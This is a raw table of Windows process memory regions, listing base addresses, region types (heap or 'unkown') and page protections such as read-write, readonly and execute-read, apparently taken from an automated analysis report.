|
1668BE40000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668B8A7000
|
unkown
|
page read and write
|
||
|
1668A383000
|
unkown
|
page read and write
|
||
|
1668E87F000
|
unkown
|
page read and write
|
||
|
166917C7000
|
heap
|
page read and write
|
||
|
1668BBAD000
|
unkown
|
page read and write
|
||
|
1668CDC3000
|
unkown
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
7FF7C56D0000
|
unkown
|
page readonly
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
20D26D64000
|
heap
|
page read and write
|
||
|
1668C2B3000
|
unkown
|
page read and write
|
||
|
1668AFD1000
|
unkown
|
page read and write
|
||
|
1668B3FB000
|
unkown
|
page read and write
|
||
|
1668A04F000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668CF4A000
|
unkown
|
page read and write
|
||
|
7FFAE6D31000
|
unkown
|
page execute read
|
||
|
2260DF91000
|
heap
|
page read and write
|
||
|
1668A6C1000
|
unkown
|
page read and write
|
||
|
4388FFE000
|
unkown
|
page readonly
|
||
|
1668AAE3000
|
unkown
|
page read and write
|
||
|
1668C125000
|
unkown
|
page read and write
|
||
|
7FF7C60F8000
|
unkown
|
page readonly
|
||
|
1668BEE3000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
43EE1FB000
|
unkown
|
page read and write
|
||
|
1668A733000
|
unkown
|
page read and write
|
||
|
1668A1ED000
|
unkown
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
1668CCA7000
|
unkown
|
page read and write
|
||
|
1668C08A000
|
unkown
|
page read and write
|
||
|
16688BA8000
|
unkown
|
page read and write
|
||
|
1668ACB5000
|
unkown
|
page read and write
|
||
|
1668C540000
|
unkown
|
page read and write
|
||
|
1668AE3A000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668B7CC000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668A16A000
|
unkown
|
page read and write
|
||
|
43FF9FE000
|
unkown
|
page readonly
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668F9AE000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668CFF5000
|
unkown
|
page read and write
|
||
|
1668C44B000
|
unkown
|
page read and write
|
||
|
1668FD21000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668A6B1000
|
unkown
|
page read and write
|
||
|
1668C50F000
|
unkown
|
page read and write
|
||
|
1668BF4C000
|
unkown
|
page read and write
|
||
|
1668FBBD000
|
unkown
|
page read and write
|
||
|
1668C0E3000
|
unkown
|
page read and write
|
||
|
1668CC55000
|
unkown
|
page read and write
|
||
|
1668B4FF000
|
unkown
|
page read and write
|
||
|
1668AE32000
|
unkown
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
1668AFB9000
|
unkown
|
page read and write
|
||
|
1668AEA4000
|
unkown
|
page read and write
|
||
|
1668A6D2000
|
unkown
|
page read and write
|
||
|
1668EDC3000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668A102000
|
unkown
|
page read and write
|
||
|
1668F90F000
|
unkown
|
page read and write
|
||
|
1668B01A000
|
unkown
|
page read and write
|
||
|
1668F8BE000
|
unkown
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
1668A41E000
|
unkown
|
page read and write
|
||
|
1668C537000
|
unkown
|
page read and write
|